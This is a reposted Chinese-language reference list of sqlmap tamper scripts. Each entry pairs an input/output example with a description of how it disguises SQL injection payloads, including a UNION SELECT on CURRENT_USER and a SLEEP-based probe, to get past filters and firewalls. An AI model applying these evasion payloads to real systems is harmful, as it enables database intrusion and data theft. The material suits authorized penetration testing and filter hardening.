sqlmap的tamper脚本大全

转载的tamper大全

脚本名:apostrophemask.py
作用:用utf8代替引号
Example:

 ("1 AND '1'='1")
 '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'Tested against:

all
—————————————————————————————
文件名:equaltolike.py
作用:like 代替等号
Example:

 * Input: SELECT * FROM users WHERE id=1
 * Output: SELECT * FROM users WHERE id LIKE 1Tested against:
  • Microsoft SQL Server 2005
  • MySQL 4, 5.0 and 5.5
    —————————————————————————————

脚本名:space2dash.py
作用:绕过过滤‘=’ 替换空格字符(”),(’ – ‘)后跟一个破折号注释,一个随机字符串和一个新行(’ n’)
Example:

 ('1 AND 9227=9227')
 '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'Tested against:
  • MSSQL
  • SQLite
    —————————————————————————————

脚本名:greatest.py
作用:绕过过滤’>’ ,用GREATEST替换大于号。
Example:
1 ('1 AND A > B')
2 '1 AND GREATEST(A,B+1)=A'Tested against:

  • MySQL 4, 5.0 and 5.5
  • Oracle 10g
  • PostgreSQL 8.3, 8.4, 9.0
    ——————————————————

脚本名:space2hash.py
作用:空格替换为#号 随机字符串 以及换行符
Example:

 * Input: 1 AND 9227=9227
 * Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227 Requirement:
  • MySQL
    Tested against:
  • MySQL 4.0, 5.0
    ——————————————————

脚本名:apostrophenullencode.py
作用:绕过过滤双引号,替换字符和双引号。
Example:

 tamper("1 AND '1'='1")
 '1 AND %00%271%00%27=%00%271'Tested against:
  • MySQL 4, 5.0 and 5.5
  • Oracle 10g
  • PostgreSQL 8.3, 8.4, 9.0
    ——————————————————

脚本名:halfversionedmorekeywords.py
作用:当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论
Example:

 ("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
 "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
        Requirement:
  • MySQL < 5.1
    Tested against:
  • MySQL 4.0.18, 5.0.22
    ———————————————–

脚本名:space2morehash.py
作用:空格替换为 #号 以及更多随机字符串 换行符
Example:

 * Input: 1 AND 9227=9227
 * Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227 Requirement:
  • MySQL >= 5.1.13
    Tested against:
  • MySQL 5.1.41
    ——————————————

脚本名:appendnullbyte.py
作用:在有效负荷结束位置加载零字节字符编码
Example:

 ('1 AND 1=1')
 '1 AND 1=1%00'Requirement:
  • Microsoft Access
    ——————————————

脚本名:ifnull2ifisnull.py
作用:绕过对 IFNULL 过滤。
替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’
Example:

 ('IFNULL(1, 2)')
 'IF(ISNULL(1),2,1)' Requirement:
  • MySQL
  • SQLite (possibly)
  • SAP MaxDB (possibly)
    Tested against:
  • MySQL 5.0 and 5.5
    ——————————————

脚本名:space2mssqlblank.py(mssql)
作用:空格替换为其它空符号
Example:

 * Input: SELECT id FROM users
 * Output: SELECT%08id%02FROM%0Fusers Requirement:
  • Microsoft SQL Server
    Tested against:
  • Microsoft SQL Server 2000
  • Microsoft SQL Server 2005

ASCII table:

SOH 01 start of heading

STX 02 start of text

ETX 03 end of text

EOT 04 end of transmission

ENQ 05 enquiry

ACK 06 acknowledge

BEL 07 bell

BS 08 backspace

TAB 09 horizontal tab

LF 0A new line

VT 0B vertical TAB

FF 0C new page

CR 0D carriage return

SO 0E shift out

SI 0F shift in

————————————————-
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS- SQL,,MYSQL,ORACLE和POSTGRESQL。SQLMAP采用四种独特的SQL注入技术,分别是盲推理SQL注入,UNION查询SQL 注入,堆查询和基于时间的SQL盲注入。其广泛的功能和选项包括数据库指纹,枚举,数据库提取,访问目标文件系统,并在获取完全操作权限时实行任意命令。 在许多情况下你可以通过使用sqlmap中的tamper脚本来对目标进行更高效的攻击。
本文是Sqlmap Tamper大全的第二篇
脚本名:base64encode.py
作用:用base64编码替换
Example:

 ("1' AND SLEEP(5)#")
 'MScgQU5EIFNMRUVQKDUpIw=='Requirement:

all
————————————————-
脚本名:space2mssqlhash.py
作用:替换空格
Example:

 ('1 AND 9227=9227')
 '1%23%0AAND%23%0A9227=9227'Requirement:
  • MSSQL
  • MySQL
    ————————————————-

脚本名:modsecurityversioned.py
作用:过滤空格,包含完整的查询版本注释
Example:

 ('1 AND 2>1--')
 '1 /*!30874AND 2>1*/--' Requirement:
  • MySQL
    Tested against:
  • MySQL 5.0
    ————————————————-

脚本名:space2mysqlblank.py
作用:空格替换其它空白符号(mysql)
Example:

 * Input: SELECT id FROM users
 * Output: SELECT%0Bid%0BFROM%A0users Requirement:
  • MySQL
    Tested against:
  • MySQL 5.1

TAB 09 horizontal TAB

LF 0A new line

FF 0C new page

CR 0D carriage return

VT 0B vertical TAB (MySQL and Microsoft SQL Server only)

- A0 - (MySQL only)

———————————————————————————-
脚本名:between.py
作用:用between替换大于号(>)
Example:
1 ('1 AND A > B--')
2 '1 AND A NOT BETWEEN 0 AND B--'Tested against:

  • Microsoft SQL Server 2005
  • MySQL 4, 5.0 and 5.5
  • Oracle 10g
  • PostgreSQL 8.3, 8.4, 9.0
    ———————————————————————————-

脚本名:modsecurityzeroversioned.py
作用:包含了完整的查询与零版本注释
Example:

 ('1 AND 2>1--')
 '1 /*!00000AND 2>1*/--' Requirement:
  • MySQL
    Tested against:
  • MySQL 5.0
    ———————————————————————————-

脚本名:space2mysqldash.py
作用:替换空格字符(”)(’ – ‘)后跟一个破折号注释一个新行(’ n’)
91ri.org注:之前有个mssql的 这个是mysql的
Example:

 ('1 AND 9227=9227')
 '1--%0AAND--%0A9227=9227'Requirement:
  • MySQL
  • MSSQL
    ———————————————————————————-

脚本名:multiplespaces.py
作用:围绕SQL关键字添加多个空格
Example:

 ('1 UNION SELECT foobar')
 '1    UNION     SELECT   foobar'Tested against:

all
———————————————————————————-
脚本名:space2plus.py
作用:用+替换空格
Example:

 ('SELECT id FROM users')
 'SELECT+id+FROM+users'Tested against:

all
———————————————————————————-
脚本名:bluecoat.py
作用:代替空格字符后与一个有效的随机空白字符的SQL语句。
然后替换=为like
Example:

 ('SELECT id FROM users where id = 1')
 'SELECT%09id FROM users where id LIKE 1'Tested against:
  • MySQL 5.1, SGOS
    ———————————————————————————-

脚本名:nonrecursivereplacement.py
双重查询语句。取代predefined SQL关键字with表示 suitable for替代(例如 .replace(“SELECT”、”")) filters
Example:

 ('1 UNION SELECT 2--')
 '1 UNIOUNIONN SELESELECTCT 2--'Tested against:

all
———————————————————————————-
脚本名:space2randomblank.py
作用:代替空格字符(“”)从一个随机的空白字符可选字符的有效集
Example:

 ('SELECT id FROM users')
 'SELECT%0Did%0DFROM%0Ausers'Tested against:

all
———————————————————————————
脚本名:percentage.py
作用:asp允许每个字符前面添加一个%号
Example:

 * Input: SELECT FIELD FROM TABLE
 * Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E Requirement:
  • ASP
    Tested against:
  • Microsoft SQL Server 2000, 2005
  • MySQL 5.1.56, 5.5.11
  • PostgreSQL 9.0
添加新评论